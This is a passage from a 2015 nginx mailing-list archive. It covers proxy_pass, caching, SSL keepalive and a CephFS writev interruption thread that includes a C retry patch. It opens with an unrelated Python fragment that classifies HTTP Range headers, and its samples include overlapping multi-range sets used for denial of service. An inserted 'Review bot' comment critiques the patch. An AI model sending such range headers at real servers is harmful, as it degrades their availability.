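           "bytes=0-,5-5,5-6,5-7", "bytes=0-0,1-1,2-2,3-3,4-4,5-5"]

if __name__ == "__main__":
    for header in SAMPLES:
        print(header, "->", range_verdict(header, 1000))
```

Under this policy a single open-ended range such as `bytes=0-` is still answered with 206, so a "Partial" status line on its own does not distinguish a server that limits range sets from one that does not.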
From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 23 Jul 2015 00:55:12 +0300 Subject: Nginx 1.8 proxying to Netty - timeout from upstream In-Reply-To: <10b1f2df3096cd9c325ed42a0b3b9d38.NginxMailingListEnglish@forum.nginx.org> References: <10b1f2df3096cd9c325ed42a0b3b9d38.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150722215512.GD1500@mdounin.ru> Hello! On Tue, Jul 21, 2015 at 03:33:13PM -0400, smuthali wrote: > I have setup Nginx proxy to a Netty server. I am seeing a timeout from > upstream, i.e. Netty. The consequence of this timeout is that the JSON > payload response is truncated (as seen on browser developer tools) > > 2015/07/21 05:08:56 [error] 6#0: *19 upstream prematurely closed connection > while reading upstream, client: 198.147.191.15, server: > sbox-wus-ui.cloudapp.net, request: "GET /api/v1/entities/DEVICE HTTP/1.1", > upstream: "http://10.0.3.4:8080/api/v1/entities/DEVICE", host: > "sbox-wus-ui.cloudapp.net", referrer: > "https://sbox-wus-ui.cloudapp.net/home.html" > > So, yes I initially thought that this is a Netty issue. However, when I make > the same API call on Netty I am able to the retrieve the full JSON payload. > > The JSON response message size is about 13k. The JSON response I see on the > Nginx side is 10K. After spending some time reading up on the Nginx > configuration parameters, I added client_body_temp and proxy_temp but to no > avail. Any help is really appreciated. The message suggests this is a backend problem. If you don't see the problem by directly talking to the backend - this may be because the problem only appears in some specific conditions triggered by nginx, e.g., only when HTTP/1.0 is used. If in doubt, try looking in nginx debug log and/or tcpdump to find out what's going on on the wire. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Wed Jul 22 23:31:54 2015 
From: nginx-forum at nginx.us (sudharshanr)
Date: Wed, 22 Jul 2015 19:31:54 -0400
Subject: Fetching a string by parsing URL
In-Reply-To:
References:
Message-ID:

For some reason, I'm getting it as null. This is my config file:

map $uri $last_path {
    ~*/(?<pathname>[^/]+)/?$ $pathname;
}

server {
    listen 80;
    root /basefolder;

    error_page 500 501 502 503 504 = /error5x.html?name=$arg_name&path=$last_path;

    location ~*/error5x.html? {
        alias /error5x.html;
    }

    location ~*/path1/ {
        if (-f $document_root/error503.html) {
            return 503;
        }
        ....
    }

However, if I update the location directive as below:

location ~*/error5x.html? {
    alias /error5x.html?name=$arg_name&path=$last_path;
}

I get a file not found error. But when I check the nginx log, I can see that it is fetching the $last_path variable. Just that it takes it as part of the file name and throws a 404 error.

Thanks.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260498#msg-260498

From lists at ruby-forum.com Thu Jul 23 10:24:39 2015
From: lists at ruby-forum.com (Puneeth Kumar)
Date: Thu, 23 Jul 2015 12:24:39 +0200
Subject: proxy_pass redirection
In-Reply-To:
References:
Message-ID:

Thanks for the quick response.
My proxy_pass path will keep on changing as per my topic, so I want to keep it dynamic. Pls check below e.g.

proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX;
or
proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX1;
or
proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX2;

So that last word I want to keep as dynamic, please help.

--
Posted via http://www.ruby-forum.com/.

From francis at daoine.org Thu Jul 23 12:14:59 2015
From: francis at daoine.org (Francis Daly) Date: Thu, 23 Jul 2015 13:14:59 +0100 Subject: proxy_pass redirection In-Reply-To: References: Message-ID: <20150723121459.GV23844@daoine.org> On Wed, Jul 22, 2015 at 11:26:11AM +0200, Puneeth Kumar wrote: Hi there, > I'm able to configured Nginx and it's working but I've challenge in > configuring it for Dynamic proxy_pass. I've tried to use wild characters > in proxy_pass it's not working, please help. The proxy_pass documentation is at http://nginx.org/r/proxy_pass. I am not sure what you mean by "dynamic". You want to make one http request of nginx; and you want nginx to make one http request of the proxy_pass upstream server. Can you give some examples of the request you make to nginx, and the request that you want nginx to make of upstream? That might make clearer what it is you want to do. Note that if you use location /one/ { proxy_pass http://upstream/two/; } then if you make a request of /one/abc, nginx will make a request of /two/abc to upstream; and if you make a request of /one/def, nginx will make a request of /two/def to upstream. Is that what you mean by "dynamic"? If so, things should Just Work. If you mean something else, please explain. f -- Francis Daly francis at daoine.org From vedran.furac at gmail.com Thu Jul 23 12:40:58 2015 
From: vedran.furac at gmail.com (Vedran Furač)
Date: Thu, 23 Jul 2015 14:40:58 +0200
Subject: Nginx writing to Cephfs
Message-ID: <55B0E0DA.7020808@gmail.com>

Hello,

I'm having an issue with nginx writing to cephfs. Often I'm getting:

writev() "/home/ceph/temp/44/94/1/0000119444" failed (4: Interrupted system call) while reading upstream

looking with strace, this happens:

...
write(65, "e\314\366\36\302"..., 65536) = ? ERESTARTSYS (To be restarted)

It happens after first 4MBs (exactly) are written, subsequent write gets ERESTARTSYS (sometimes, but more rarely, it fails after first 32 or 64MBs, etc are written). Apparently nginx doesn't expect this and doesn't handle it so it cancels writes and deletes this partial file. Looking at the code, I saw it doesn't handle ERESTARTSYS in any different way compared to other write errors. Shouldn't it try to write same data again for a couple of times before finally giving up and erroring out? Do you have any suggestions on how to resolve this? I'm using latest stable nginx.

Regards,
Vedran

From vbart at nginx.com Thu Jul 23 13:44:07 2015
From: vbart at nginx.com (Valentin V. Bartenev) Date: Thu, 23 Jul 2015 16:44:07 +0300 Subject: Nginx writing to Cephfs In-Reply-To: <55B0E0DA.7020808@gmail.com> References: <55B0E0DA.7020808@gmail.com> Message-ID: <4007463.aySMZuG2dP@vbart-workstation> On Thursday 23 July 2015 14:40:58 Vedran Furač wrote: > Hello, > > I'm having an issue with nginx writing to cephfs. Often I'm getting: > > writev() "/home/ceph/temp/44/94/1/0000119444" failed (4: Interrupted > system call) while reading upstream > > looking with strace, this happens: > > ... > write(65, "e\314\366\36\302"..., 65536) = ? ERESTARTSYS (To be restarted) > > It happens after first 4MBs (exactly) are written, subsequent write gets > ERESTARTSYS (sometimes, but more rarely, it fails after first 32 or > 64MBs, etc are written). Apparently nginx doesn't expect this and > doesn't handle it so it cancels writes and deletes this partial file. > Looking at the code, I saw it doesn't handle ERESTARTSYS in any > different way compared to other write errors. Shouldn't it try to write > same data again for a couple of times before finally giving up and > erroring out? Do you have any suggestions on how to resolve this? I'm > using latest stable nginx. > > It more looks like a bug in cephfs. writev() should never return ERESTARTSYS. wbr, Valentin V. Bartenev From nginx-forum at nginx.us Thu Jul 23 15:46:16 2015 
From: nginx-forum at nginx.us (smuthali) Date: Thu, 23 Jul 2015 11:46:16 -0400 Subject: Nginx 1.8 proxying to Netty - timeout from upstream In-Reply-To: <20150722215512.GD1500@mdounin.ru> References: <20150722215512.GD1500@mdounin.ru> Message-ID: Maxim, many thanks for the reply. I did run a tcpdump on nginx port 8080 and dst being Netty. I did not see anything out of the ordinary in the packet capture. Essentially I see an HTTP 200 OK for response and the connections are torn down as expected. I will run another packet capture just in case I overlooked something. Thanks again. Satish Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260455,260522#msg-260522 From nginx-forum at nginx.us Thu Jul 23 18:36:27 2015 From: nginx-forum at nginx.us (sudharshanr) Date: Thu, 23 Jul 2015 14:36:27 -0400 Subject: Fetching a string by parsing URL In-Reply-To: References: Message-ID: <64b34a5c0329127737a1c94e4e2c1d1f.NginxMailingListEnglish@forum.nginx.org> For some reason, I'm getting it as null. This is my config file: map $uri $last_path { ~*/(?<pathname>[^/]+)/?$ $pathname; } server { listen 80; root /basefolder; error_page 500 501 502 503 504 = /error5x.html?name=$arg_name&path=$last_path; location ~*/error5x.html? { alias /Desktop/error5x.html; } location ~*/path1/ { if (-f $document_root/error503.html) { return 503; } .... } However, if I update the location directive as below: location ~*/error5x.html? { alias ?Desktop/error5x.html?name=$arg_name&path=$last_path; } I get a file not found error. But when I check the nginx log, I can see that it is fetching the $last_path variable. Just that it takes it as part of the file name and throws a 404 error. So it's something like file /Desktop/error5x.html?name=abc&path=xyz not found. Thanks. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260525#msg-260525 From nginx-forum at nginx.us Thu Jul 23 18:51:58 2015 
From: nginx-forum at nginx.us (vedranf) Date: Thu, 23 Jul 2015 14:51:58 -0400 Subject: Nginx writing to Cephfs In-Reply-To: <4007463.aySMZuG2dP@vbart-workstation> References: <4007463.aySMZuG2dP@vbart-workstation> Message-ID: <56b3847718c3b907e63f2473dbc50455.NginxMailingListEnglish@forum.nginx.org> Valentin V. Bartenev Wrote: > It more looks like a bug in cephfs. writev() should never return > ERESTARTSYS. I've talked to the ceph people, they say ERESTARTSYS shows up in strace output but it is handled by the kernel and that writev(2) is interrupted by the SIGALRM, which actually appears in the strace output just after writev fails. I also failed to get this error by doing the same this as nginx using dd, dd always succeeded so it happens due to combination of nginx and cephfs. Here's full strace output (2 examples from 2 differently configured servers): http://pastebin.com/wUAAcdT7 http://pastebin.com/wHyWc9U5 Thanks, Vedran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260512,260527#msg-260527 From mdounin at mdounin.ru Thu Jul 23 19:21:24 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 23 Jul 2015 22:21:24 +0300 Subject: Tweak fastcgi_buffer In-Reply-To: References: Message-ID: <20150723192124.GB19190@mdounin.ru> Hello! On Wed, Jul 22, 2015 at 05:50:12PM -0400, Karl Johnson wrote: > Hello, > > I need to tweak fastcgi_buffer to 1m on a website that has heavy requests > to avoid buffer. If I use a distro with 4096 pagesize, is it better to do > 256x 4k or 4x 256k? > > [root at web ~]# getconf PAGESIZE > 4096 > [root at web ~]# > > fastcgi_buffer_size 4k; > fastcgi_buffers 256 4k; > > OR > > fastcgi_buffer_size 256k; > fastcgi_buffers 4 256k; I would recommend the latter. Or, alternatively, something like fastcgi_buffers 8 128k; Too many small buffers will result in extra processing overhead, and it's unlikely to be a good solution. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Thu Jul 23 19:32:26 2015 
From: nginx-forum at nginx.us (sudharshanr) Date: Thu, 23 Jul 2015 15:32:26 -0400 Subject: Fetching a string by parsing URL In-Reply-To: References: Message-ID: <47162e390120903faa9cbe3acbc9f890.NginxMailingListEnglish@forum.nginx.org> For some reason, I'm getting it as null. This is my config file: map $uri $last_path { ~*/(?<pathname>[^/]+)/?$ $pathname; } server { listen 80; root /basefolder; error_page 500 501 502 503 504 = /error5x.html?name=$arg_name&path=$last_path; location ~*/error5x.html? { alias /Desktop/error5x.html; } location ~*/path1/ { if (-f $document_root/error503.html) { return 503; } .... } However, if I update the location directive as below: location ~*/error5x.html? { alias /Desktop/error5x.html?name=$arg_name&path=$last_path; } I get a file not found error. But when I check the nginx log, I can see that it is fetching the $last_path variable. Just that it takes it as part of the file name and throws a 404 error. So it's something like "open() "/Desktop/error5x.html?name=abc&path=xyz" failed (2: No such file or directory),". Thanks. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260458,260531#msg-260531 From lists at ruby-forum.com Fri Jul 24 09:16:12 2015 From: lists at ruby-forum.com (Puneeth Kumar) Date: Fri, 24 Jul 2015 11:16:12 +0200 Subject: proxy_pass redirection In-Reply-To: References: Message-ID: Thank you Francis for the links & the solution. Sorry for confusion, proxy_pass is working for me. I'm passing below link (exact URI) to proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX. I want to keep the link(URI) only till http://IP:8881/ingestion/v1.0/streams/ & the last word (NGINX) application should pick. So Can I pass * type of wild char to the link? please help. http://IP:8881/ingestion/v1.0/streams/* Thank you -- Posted via http://www.ruby-forum.com/. From nginx-forum at nginx.us Fri Jul 24 13:40:03 2015 
From: nginx-forum at nginx.us (vedranf) Date: Fri, 24 Jul 2015 09:40:03 -0400 Subject: Nginx writing to Cephfs In-Reply-To: <4007463.aySMZuG2dP@vbart-workstation> References: <4007463.aySMZuG2dP@vbart-workstation> Message-ID: <6d65568154ecd491a4f7a905a1f3110c.NginxMailingListEnglish@forum.nginx.org> Hello, So the Ceph devs' final reply was: "ngx_write_fd() is just a write(), which, when interrupted by SIGALRM, fails with EINTR because SA_RESTART is not set. We can try digging further, but I think nginx should retry in this case." Let me know what you think. Thanks, Vedran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260512,260540#msg-260540 From nginx-forum at nginx.us Fri Jul 24 13:40:40 2015 
From: nginx-forum at nginx.us (khav) Date: Fri, 24 Jul 2015 09:40:40 -0400 Subject: keepalive_timeout timeout causes high TTFB Message-ID: <0a1ca52bf9ba4f0ceb9e1eeb98cb2a76.NginxMailingListEnglish@forum.nginx.org> I am trying to further optimize SSL but if I enable keepalive_timeout I get high TTFB as shown in the report below http://tools.pingdom.com/fpt/#!/KggzF When I disable keepalive_timeout, TTFB is fixed but nginx recommends keepalive_timeout: http://nginx.org/en/docs/http/configuring_https_servers.html Why does this happen? I welcome any other advice to further optimise SSL Thanks listen 443 spdy default_server reuseport; ssl on; ssl_certificate /etc/ssl/filterbypass.me.crt; #(or .pem) ssl_certificate_key /etc/ssl/filterbypass.me.key.nopass; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; #keepalive_timeout 70; #ssl_ciphers ECDHE-RSA-AES256-SHA384:AES256-SHA256:RC4:HIGH:!MD5:!aNULL:!eNULL:!NULL:!DH:!EDH:!AESGCM; ssl_ciphers ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+3DES:!aNULL:!MD5:!DSS; ssl_prefer_server_ciphers on; ssl_buffer_size 8k; ssl_session_cache shared:SSL:20m; ssl_dhparam /etc/ssl/dhparam.pem; ssl_session_timeout 45m; ssl_stapling on; ssl_stapling_verify on; ssl_trusted_certificate /etc/ssl/trustchain.crt; resolver 8.8.8.8 8.8.4.4 valid=300s; resolver_timeout 5s; add_header Strict-Transport-Security "max-age=31536000; includeSubDomains"; Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260541,260541#msg-260541 From vbart at nginx.com Fri Jul 24 13:41:17 2015 
From: vbart at nginx.com (Valentin V. Bartenev) Date: Fri, 24 Jul 2015 16:41:17 +0300 Subject: Nginx writing to Cephfs In-Reply-To: <56b3847718c3b907e63f2473dbc50455.NginxMailingListEnglish@forum.nginx.org> References: <4007463.aySMZuG2dP@vbart-workstation> <56b3847718c3b907e63f2473dbc50455.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1603893.Br3xI9xU16@vbart-workstation> On Thursday 23 July 2015 14:51:58 vedranf wrote: > Valentin V. Bartenev Wrote: > > > It more looks like a bug in cephfs. writev() should never return > > ERESTARTSYS. > > > I've talked to the ceph people, they say ERESTARTSYS shows up in strace > output but it is handled by the kernel and that writev(2) is interrupted by > the SIGALRM, which actually appears in the strace output just after writev > fails. > > I also failed to get this error by doing the same this as nginx using dd, dd > always succeeded so it happens due to combination of nginx and cephfs. > > Here's full strace output (2 examples from 2 differently configured > servers): > > http://pastebin.com/wUAAcdT7 > > http://pastebin.com/wHyWc9U5 > Do you have timer_resolution configured? wbr, Valentin V. Bartenev From nginx-forum at nginx.us Fri Jul 24 13:55:04 2015 
From: nginx-forum at nginx.us (vedranf) Date: Fri, 24 Jul 2015 09:55:04 -0400 Subject: Nginx writing to Cephfs In-Reply-To: <1603893.Br3xI9xU16@vbart-workstation> References: <1603893.Br3xI9xU16@vbart-workstation> Message-ID: Valentin V. Bartenev Wrote: ------------------------------------------------------- > On Thursday 23 July 2015 14:51:58 vedranf wrote: > > Valentin V. Bartenev Wrote: > > > > > It more looks like a bug in cephfs. writev() should never return > > > ERESTARTSYS. > > > > > > I've talked to the ceph people, they say ERESTARTSYS shows up in > strace > > output but it is handled by the kernel and that writev(2) is > interrupted by > > the SIGALRM, which actually appears in the strace output just after > writev > > fails. > > > > I also failed to get this error by doing the same this as nginx > using dd, dd > > always succeeded so it happens due to combination of nginx and > cephfs. > > > > Here's full strace output (2 examples from 2 differently configured > > servers): > > > > http://pastebin.com/wUAAcdT7 > > > > http://pastebin.com/wHyWc9U5 > > > > Do you have timer_resolution configured? Yes, it's: timer_resolution 50ms; Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260512,260543#msg-260543 From vbart at nginx.com Fri Jul 24 14:20:15 2015 
From: vbart at nginx.com (Valentin V. Bartenev) Date: Fri, 24 Jul 2015 17:20:15 +0300 Subject: Nginx writing to Cephfs In-Reply-To: References: <1603893.Br3xI9xU16@vbart-workstation> Message-ID: <8361838.MWInrWyZBq@vbart-workstation> On Friday 24 July 2015 09:55:04 vedranf wrote: > Valentin V. Bartenev Wrote: > ------------------------------------------------------- > > On Thursday 23 July 2015 14:51:58 vedranf wrote: > > > Valentin V. Bartenev Wrote: > > > > > > > It more looks like a bug in cephfs. writev() should never return > > > > ERESTARTSYS. > > > > > > > > > I've talked to the ceph people, they say ERESTARTSYS shows up in strace > > > output but it is handled by the kernel and that writev(2) is interrupted by > > > the SIGALRM, which actually appears in the strace output just after writev > > > fails. > > > > > > I also failed to get this error by doing the same this as nginx using dd, dd > > > always succeeded so it happens due to combination of nginx and cephfs. > > > > > > Here's full strace output (2 examples from 2 differently configured > > > servers): > > > > > > http://pastebin.com/wUAAcdT7 > > > > > > http://pastebin.com/wHyWc9U5 > > > > > > > Do you have timer_resolution configured? > > Yes, it's: > > timer_resolution 50ms; > This is the root cause of interrupts. Every 50ms it signals nginx and can interrupt any interruptible syscall (writing to file is usually not, but it seems different for Cephfs). You should avoid using timer_resolution, or try this patch: diff -r be8d8b1dad78 src/os/unix/ngx_files.c --- a/src/os/unix/ngx_files.c Fri Jul 24 17:18:20 2015 +0300 +++ b/src/os/unix/ngx_files.c Fri Jul 24 17:18:37 2015 +0300 @@ -264,6 +264,7 @@ ngx_write_chain_to_file(ngx_file_t *file u_char *prev; size_t size; ssize_t total, n; + ngx_err_t err; ngx_array_t vec; struct iovec *iov, iovs[NGX_IOVS]; 
@@ -335,10 +336,20 @@ ngx_write_chain_to_file(ngx_file_t *file file->sys_offset = offset; } +eintr: + n = writev(file->fd, vec.elts, vec.nelts); if (n == -1) { - ngx_log_error(NGX_LOG_CRIT, file->log, ngx_errno, + err = ngx_errno; + + if (err == NGX_EINTR) { + ngx_log_debug0(NGX_LOG_DEBUG_EVENT, c->log, err, + "writev() was interrupted"); + goto eintr; + } + + ngx_log_error(NGX_LOG_CRIT, file->log, err, "writev() \"%s\" failed", file->name.data); return NGX_ERROR; } From vbart at nginx.com Fri Jul 24 14:30:08 2015 From: vbart at nginx.com (Valentin V. Bartenev) Date: Fri, 24 Jul 2015 17:30:08 +0300 Subject: keepalive_timeout timeout causes high TTFB In-Reply-To: <0a1ca52bf9ba4f0ceb9e1eeb98cb2a76.NginxMailingListEnglish@forum.nginx.org> References: <0a1ca52bf9ba4f0ceb9e1eeb98cb2a76.NginxMailingListEnglish@forum.nginx.org> Message-ID: <5553992.ylcKOAR1Tb@vbart-workstation> On Friday 24 July 2015 09:40:40 khav wrote: > I am trying to further optimize SSL but if i enable keepalive_timeout i get > high TTFB as shown in the report below > > http://tools.pingdom.com/fpt/#!/KggzF > > When i disable keepalive_timeout , TTFB is fixed but nginx recommand > keepalive_timeout : > http://nginx.org/en/docs/http/configuring_https_servers.html > > Why does this happen ? [..] In the report above SPDY protocol was used, but the keepalive_timeout directive configures a timeout for https keepalive connections, and has no effect with SPDY. I believe it was just a coincidence, and big TTFB caused by something else. wbr, Valentin V. Bartenev From highclass99 at gmail.com Fri Jul 24 16:54:04 2015 
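Review bot: In the second hunk of the ngx_files.c patch, the new ngx_log_debug0() call logs to c->log, while the error path a few lines below uses file->log and none of the declarations visible in the first hunk (prev, size, total, n, err, vec, iov, iovs) is a c; with debug logging compiled in this looks like it will not build, so pass file->log there as well. The "goto eintr" retry is also unbounded: if the signal keeps arriving before writev() makes any progress the worker loops here with only a debug-level trace, so consider a retry cap that falls through to the existing NGX_LOG_CRIT path.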
From: highclass99 at gmail.com (highclass99) Date: Sat, 25 Jul 2015 01:54:04 +0900 Subject: Optimzing hard drive IO for proxy_pass Message-ID: I have server A with a large HDD at IDC 1 (TB hdd) I have server B with cheap bandwidth at IDC 2 (very small virtual server 20 GB hdd) I send all image requests to server B, and it caches from A. My problem is that on server IO is really high Server B iostat Device: rrqm/s wrqm/s r/s w/s rsec/s wsec/s avgrq-sz avgqu-sz await svctm %util sda 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41 2.95 2.20 0.36 47.67 sda1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sda2 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41 2.95 2.20 0.36 47.67 dm-0 0.00 0.00 1297.37 593.93 19922.27 4751.42 13.05 8.78 4.64 0.25 47.71 dm-1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 Here is my related nginx config --------------- cut -------------------------------------- proxy_cache_path /cache levels=1:2 keys_zone=MEDIA:200m inactive=2d max_size=6g; --------------- cut -------------------------------------- location / { proxy_pass http://SERVER_A proxy_cache MEDIA; proxy_cache_key "$scheme$request_uri"; proxy_cache_valid 200 302 304 7d; proxy_cache_valid 301 1h; proxy_cache_valid any 1m; proxy_cache_use_stale error timeout invalid_header http_500 http_502 http_503 http_504 http_404 updating; proxy_ignore_headers Cache-Control Expires Set-Cookie; proxy_cache_min_uses 3; proxy_cache_lock on; proxy_cache_lock_timeout 15s; expires 7d; } --------------- cut -------------------------------------- Server B has nothing else running. Server B is sending about 200~400 MBs traffic outside Is such a high IO load normal? Is there a way I can decrease the IO load while keeping the caching of server B efficient? Thank you. -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Jul 24 17:28:37 2015 
From: nginx-forum at nginx.us (vedranf) Date: Fri, 24 Jul 2015 13:28:37 -0400 Subject: Nginx writing to Cephfs In-Reply-To: <8361838.MWInrWyZBq@vbart-workstation> References: <8361838.MWInrWyZBq@vbart-workstation> Message-ID: <52f0229069bcdf8d4b590158e80c9aa7.NginxMailingListEnglish@forum.nginx.org> Valentin V. Bartenev Wrote: ------------------------------------------------------- > On Friday 24 July 2015 09:55:04 vedranf wrote: > > Valentin V. Bartenev Wrote: > > ------------------------------------------------------- > > > On Thursday 23 July 2015 14:51:58 vedranf wrote: > > > > Valentin V. Bartenev Wrote: > > > > > > > > > It more looks like a bug in cephfs. writev() should never > return > > > > > ERESTARTSYS. > > > > > > > > > > > > I've talked to the ceph people, they say ERESTARTSYS shows up in > strace > > > > output but it is handled by the kernel and that writev(2) is > interrupted by > > > > the SIGALRM, which actually appears in the strace output just > after writev > > > > fails. > > > > > > > > I also failed to get this error by doing the same this as nginx > using dd, dd > > > > always succeeded so it happens due to combination of nginx and > cephfs. > > > > > > > > Here's full strace output (2 examples from 2 differently > configured > > > > servers): > > > > > > > > http://pastebin.com/wUAAcdT7 > > > > > > > > http://pastebin.com/wHyWc9U5 > > > > > > > > > > Do you have timer_resolution configured? > > > > Yes, it's: > > > > timer_resolution 50ms; > > > > This is the root cause of interrupts. Every 50ms it signals nginx > and can interrupt any interruptible syscall (writing to file is > usually not, but it seems different for Cephfs). > > You should avoid using timer_resolution, or try this patch: Thank you, removing timer_resolution fixed the problem. I'll look into the patch in the next few days. Regards, Vedran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260512,260550#msg-260550 From francis at daoine.org Fri Jul 24 22:44:55 2015 
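The failure diagnosed in this thread (a periodic SIGALRM installed without SA_RESTART interrupting a blocking writev()), reproduced as an added example that is neither nginx code nor the patch posted above. A full pipe stands in for the slow CephFS write; `writev_retry`, `run_demo` and the retry cap of 8 are assumptions of this sketch, and unlike an unbounded retry the cap lets the caller still fail cleanly.

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700               /* sigaction(), setitimer() */
#endif
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/time.h>
#include <sys/uio.h>
#include <unistd.h>

static volatile sig_atomic_t alarms_seen;   /* SIGALRM deliveries so far */
static int drain_fd = -1;                   /* pipe read end the handler drains */
/* Stands in for the timer_resolution tick. Draining one page lets the
 * retried write make progress, as the slow filesystem eventually would. */
static void on_alarm(int signo)
{
    char sink[4096];
    int  saved = errno;
    (void) signo;
    alarms_seen++;
    if (drain_fd != -1 && read(drain_fd, sink, sizeof(sink)) < 0) {
        /* nothing to drain */
    }
    errno = saved;
}

/* writev() restarted after EINTR, at most max_retries times. Short writes
 * and every other error are returned to the caller unchanged. */
ssize_t writev_retry(int fd, const struct iovec *iov, int iovcnt,
                     int max_retries, int *eintr_count)
{
    ssize_t n;
    int     tries = 0;
    for ( ;; ) {
        n = writev(fd, iov, iovcnt);
        if (n != -1 || errno != EINTR) {
            return n;
        }
        (*eintr_count)++;
        if (++tries > max_retries) {
            return -1;                  /* give up; errno is still EINTR */
        }
    }
}

struct demo_result { ssize_t written; int eintr_count; int alarms; };
struct demo_result run_demo(void)
{
    struct demo_result r = { -1, 0, 0 };
    struct sigaction   sa;
    struct itimerval   tick;
    struct iovec       iov[2];
    char               page[4096], head[256], body[256];
    int                p[2];

    if (pipe(p) == -1) return r;
    /* Constructed "slow file": fill the pipe so the next write must block. */
    memset(page, 'x', sizeof(page));
    fcntl(p[1], F_SETFL, O_NONBLOCK);
    while (write(p[1], page, sizeof(page)) > 0) { /* until EAGAIN */ }
    fcntl(p[1], F_SETFL, 0);            /* writer blocks again */
    fcntl(p[0], F_SETFL, O_NONBLOCK);   /* handler's read never blocks */
    drain_fd = p[0];

    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = on_alarm;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = 0;                    /* no SA_RESTART: blocked calls get EINTR */
    sigaction(SIGALRM, &sa, NULL);

    alarms_seen = 0;
    memset(&tick, 0, sizeof(tick));
    tick.it_value.tv_usec = 50000;      /* 50ms, the thread's timer_resolution */
    tick.it_interval.tv_usec = 50000;
    setitimer(ITIMER_REAL, &tick, NULL);

    memset(head, 'h', sizeof(head));
    memset(body, 'b', sizeof(body));
    iov[0].iov_base = head;  iov[0].iov_len = sizeof(head);
    iov[1].iov_base = body;  iov[1].iov_len = sizeof(body);
    r.written = writev_retry(p[1], iov, 2, 8, &r.eintr_count);

    memset(&tick, 0, sizeof(tick));     /* stop the timer before cleaning up */
    setitimer(ITIMER_REAL, &tick, NULL);
    signal(SIGALRM, SIG_IGN);
    drain_fd = -1;
    r.alarms = (int) alarms_seen;
    close(p[0]); close(p[1]);
    return r;
}

int main(void)
{
    struct demo_result r = run_demo();
    printf("written=%ld eintr=%d alarms=%d\n", (long) r.written, r.eintr_count, r.alarms);
    return r.written == 512 ? 0 : 1;
}
```

Setting `sa.sa_flags = SA_RESTART` in `run_demo` makes the kernel restart the call itself, so the interrupted write is no longer reported to the caller as EINTR.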
From: francis at daoine.org (Francis Daly) Date: Fri, 24 Jul 2015 23:44:55 +0100 Subject: proxy_pass redirection In-Reply-To: References: Message-ID: <20150724224455.GW23844@daoine.org> On Fri, Jul 24, 2015 at 11:16:12AM +0200, Puneeth Kumar wrote: Hi there, > Sorry for confusion, proxy_pass is working for me. > > I'm passing below link (exact URI) to proxy_pass > > http://IP:8881/ingestion/v1.0/streams/NGINEX. > > I want to keep the link(URI) only till > http://IP:8881/ingestion/v1.0/streams/ > & the last word (NGINX) application should pick. I do not understand what you want. Can you write down one request that you will make to nginx, and the matching request that you want nginx to make to its upstream? And then, write down one other request that you will make to nginx, and the matching request that you want nginx to make to its upstream. That may make it clear what proxy_pass directive you want. f -- Francis Daly francis at daoine.org From francis at daoine.org Fri Jul 24 22:53:38 2015 
From: francis at daoine.org (Francis Daly) Date: Fri, 24 Jul 2015 23:53:38 +0100 Subject: Fetching a string by parsing URL In-Reply-To: <47162e390120903faa9cbe3acbc9f890.NginxMailingListEnglish@forum.nginx.org> References: <47162e390120903faa9cbe3acbc9f890.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150724225338.GX23844@daoine.org> On Thu, Jul 23, 2015 at 03:32:26PM -0400, sudharshanr wrote: Hi there? > For some reason, I'm getting it as null. This is my config file: What, specifically, are you getting as null? What response do you see that you do not want to see? If you make a request for /path1/one?name=two, what response do you want? Is it http 503 with the content of the file /Desktop/error5x.html, or something else? Where does "one" and "two" come into the response that you want to get? > However, if I update the location directive as below: > > location ~*/error5x.html? { > alias /Desktop/error5x.html?name=$arg_name&path=$last_path; > } > > I get a file not found error. Yes; that is what you have told nginx to do. (Unless you have a file with a name like /Desktop/error5x.html?name=two&path=one, which you probably do not.) If you can describe what you want to have happen, perhaps someone can tell you how to tell nginx to get that to happen. f -- Francis Daly francis at daoine.org From vikrant.thakur at gmail.com Fri Jul 24 23:09:02 2015 
